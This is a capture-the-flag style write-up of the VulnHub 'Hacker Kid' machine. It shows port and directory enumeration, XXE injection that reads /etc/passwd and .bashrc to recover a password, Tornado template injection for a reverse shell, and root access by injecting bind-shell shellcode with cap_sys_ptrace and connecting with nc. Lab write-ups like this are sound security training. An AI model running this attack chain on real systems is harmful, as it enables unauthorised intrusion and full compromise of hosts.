Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# Nmap 7.92 scan initiated Sun Feb 13 04:48:02 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Hacker_kid_1.0.1/192.168.110.28/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Hacker_kid_1.0.1/192.168.110.28/scans/xml/_full_tcp_nmap.xml 192.168.110.28
Nmap scan report for 192.168.110.28
Host is up, received arp-response (0.00045s latency).
Scanned at 2022-02-13 04:48:04 +08 for 21s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 64 ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Notorious Kid : A Hacker
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
9999/tcp open http syn-ack ttl 64 Tornado httpd 6.1
| http-title: Please Log In
|_Requested resource was /login?next=%2F
| http-methods:
|_ Supported Methods: GET POST
|_http-server-header: TornadoServer/6.1
MAC Address: 08:00:27:9A:3F:A1 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/13%OT=53%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=620
OS:81D1A%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B
OS:4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88
OS:)ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=N)IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 16.912 days (since Thu Jan 27 06:55:50 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.110.28
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 13 04:48:26 2022 -- 1 IP address (1 host up) scanned in 25.79 seconds
TCP/80 (HTTP)
FFUF - common.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.28/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
app.html [Status: 200, Size: 8048, Words: 2070, Lines: 265]
cgi-bin/.php [Status: 403, Size: 279, Words: 20, Lines: 10]
cgi-bin/ [Status: 403, Size: 279, Words: 20, Lines: 10]
cgi-bin/.html [Status: 403, Size: 279, Words: 20, Lines: 10]
css [Status: 301, Size: 314, Words: 20, Lines: 10]
images [Status: 301, Size: 317, Words: 20, Lines: 10]
index.php [Status: 200, Size: 3597, Words: 596, Lines: 113]
index.php [Status: 200, Size: 3597, Words: 596, Lines: 113]
javascript [Status: 301, Size: 321, Words: 20, Lines: 10]
form.html [Status: 200, Size: 10219, Words: 2459, Lines: 248]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 4939 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
app.html
index.php
images
form.html
cgi-bin/
TCP/9999 (HTTP)
FFUF - common.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1]
└─# ffuf -u http://$ip:9999/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.28:9999/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php .cgi
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 302, Size: 0, Words: 1, Lines: 1]
login [Status: 200, Size: 452, Words: 21, Lines: 20]
logout [Status: 302, Size: 0, Words: 1, Lines: 1]
:: Progress: [23075/23075] :: Job [1/1] :: 829 req/sec :: Duration: [0:00:34] :: Errors: 0 ::
login
logout
Nikto
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.110.28
+ Target Hostname: 192.168.110.28
+ Target Port: 9999
+ Start Time: 2022-02-13 04:56:50 (GMT8)
---------------------------------------------------------------------------
+ Server: TornadoServer/6.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /login?next=%2F
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7917 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2022-02-13 05:00:35 (GMT8) (225 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
TornadoServer/6.1
/login?next=%2F
Initial Foothold
TCP/9999 (HTTP) - Python Tornado Server
- Proceed to
login
login?next=&2F
- Attempted to exploit
login?next=&2F
- LFI
- Command Injection
- Attempt SQLi
- All Failed
- Managed to trigger an error
- What is
TornadoServer
Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Find exploits for
TornadoServer/6.1
Exploit URL SSTI (Server Side Template Injection) https://opsecx.com/index.php/2016/07/03/server-side-template-injection-in-tornado/ SSTI (Server Side Template Injection) https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python - Attempt SSTI
- Did not work, we might have to obtain a valid credential and login before we can exploit this vulnerability
TCP/80 (HTTP) - Fuzz GET Parameter
- Directory enumerate
cgi-bin/FUZZ
- Did not find any
.cgi
files
- Did not find any
- View enumerated directories
app.html
- Could not find any vulnerabilities
index.php
- GET parameter:
?page_no
- GET parameter:
form.html
- Could not find any vulnerabilities
- Enumerate
page_no
GET parameter- Setup
- Results
- Setup
- Add
hackers.blackhat.local
to/etc/hosts
1
echo "192.168.110.28 hackers.blackhat.local" >> /etc/hosts
TCP/80 (HTTP) - DNS Enumeration
- Enumerate subdomains w/
dig
,dig
command in Linux is used to gather DNS information1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1] └─# dig hackers.blackhat.local @$ip ; <<>> DiG 9.18.0-2-Debian <<>> hackers.blackhat.local @192.168.110.28 ;; global options: +cmd ;; Got answer: ;; WARNING: .local is reserved for Multicast DNS ;; You are currently testing what happens when an mDNS query is leaked to DNS ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34032 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ; COOKIE: c00738aff09f1cee0100000062089d0bf24fa6beb3cfd099 (good) ;; QUESTION SECTION: ;hackers.blackhat.local. IN A ;; AUTHORITY SECTION: blackhat.local. 3600 IN SOA blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600 ;; Query time: 0 msec ;; SERVER: 192.168.110.28#53(192.168.110.28) (UDP) ;; WHEN: Sun Feb 13 05:54:20 +08 2022 ;; MSG SIZE rcvd: 125
hackerkid.blackhat.local
- Add
hackerkid.blackhat.local
to/etc/hosts
1 2
┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1] └─# echo "192.168.110.28 hackerkid.blackhat.local" >> /etc/hosts
- Proceed to
hackerkid.blackhat.local
TCP/80 (HTTP) - XXE Injection
- Submit a form, intercept it w/ burp
- The request is in
XML
format. - The email field is reflected back, we can try XXE injection in the email field.
- Payload
- The request is in
- Attempt to do XXE Injection in the email field
- Obtain users in
/etc/passwd
1 2 3
┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1/192.168.110.28/exploit] └─# cat passwd | awk -F: '($3>=1000)&&($1!="nobody"){print $1}' saket
saket
- Include files in saket’s home directory
.bashrc
,.bash_history
- failed
- Instead, use
PHP Wrapper
to view the files.bash_history
.bashrc
- Decoded
1 2 3 4 5 6
┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1/192.168.110.28/exploit] └─# base64 -d encoded_bashrc.txt SNIP #Setting Password for running python app username="admin" password="Saket!#$%@!!"
- admin:
Saket!#$%@!!
- admin:
TCP/9999 (HTTP) - SSTI
- Login w/ admin:
Saket!#$%@!!
, failed - Login w/ saket:
Saket!#$%@!!
- Fuzz for vulnerabilities
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1/192.168.110.28/exploit] └─# ffuf -u http://192.168.110.28:9999/?W1=W2 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt:W1 -w /usr/share/wordlists/LFI/file_inclusion_linux.txt:W2 -H 'Cookie: _xsrf=2|e138688c|df38105665c8988ec4ff6530f419a2fb|1644728769; user="2|1:0|10:1644767656|4:user|8:c2FrZXQ=|953dbb527b615cab4e0506589c0196f949dda3f2a5da54595de6f7e06f634569"; incorrect="2|1:0|10:1644767656|9:incorrect|4:MA==|5bd1a9396865cb7a0745567ff013abea8fdc3182995d897fb284520b39005898"' -fw 21 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://192.168.110.28:9999/?W1=W2 :: Wordlist : W1: /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt :: Wordlist : W2: /usr/share/wordlists/LFI/file_inclusion_linux.txt :: Header : Cookie: _xsrf=2|e138688c|df38105665c8988ec4ff6530f419a2fb|1644728769; user="2|1:0|10:1644767656|4:user|8:c2FrZXQ=|953dbb527b615cab4e0506589c0196f949dda3f2a5da54595de6f7e06f634569"; incorrect="2|1:0|10:1644767656|9:incorrect|4:MA==|5bd1a9396865cb7a0745567ff013abea8fdc3182995d897fb284520b39005898" :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405 :: Filter : Response words: 21 ________________________________________________ [Status: 200, Size: 274, Words: 10, Lines: 19] * W1: name * W2: %00../../../../../../etc/passwd [Status: 200, Size: 274, Words: 10, Lines: 19] * W2: %00../../../../../../etc/shadow * W1: name [Status: 200, Size: 240, Words: 10, Lines: 19] * W1: name * W2: %00/etc/passwd%00
?name=<SSTI Payload>
Exploits we found earlier
Exploit URL SSTI (Server Side Template Injection) https://opsecx.com/index.php/2016/07/03/server-side-template-injection-in-tornado/ SSTI (Server Side Template Injection) https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python - Attempt SSTI
- URL Encode reverse shell payload
- Obtain shell
Privilege Escalation
Root - Via Linux Capabilities (SYS_PTRACE)
- Linpeas
cap_sys_ptrace+ep
is set onpython2.7
, this can be used for privilege escalation.sys_ptrace
exploit demo
- Exploiting
sys_ptrace
- Find a process running as root
1 2 3 4
saket@ubuntu:/tmp$ ps aux | grep root ... root 766 0.0 0.4 199780 4728 ? Ss 20:15 0:00 /usr/sbin/apache2 -k start ...
PID 766
- Download a bindshell shellcode payload
- This will start a bind shell at
TCP/5600
- This will start a bind shell at
- Download
inject.py
exploit - Add bindshell shellcode at Line 70
- Run
inject.py
specifyingPID 766
1 2 3 4 5
saket@ubuntu:/tmp$ /usr/bin/python2.7 inject.py 766 Instruction Pointer: 0x7f1554d1d0daL Injecting Shellcode at: 0x7f1554d1d0daL Shellcode Injected!! Final Instruction Pointer: 0x7f1554d1d0dcL
- Obtain root shell
1 2 3 4
┌──(root💀kali)-[~/vulnHub/Hacker_kid_1.0.1/192.168.110.28/exploit] └─# nc 192.168.110.28 5600 id uid=0(root) gid=0(root) groups=0(root)
- Alternative
1
saket@ubuntu:/tmp$ for x in {1..1000}; do /usr/bin/python2.7 inject.py $x; done
Comments powered by Disqus.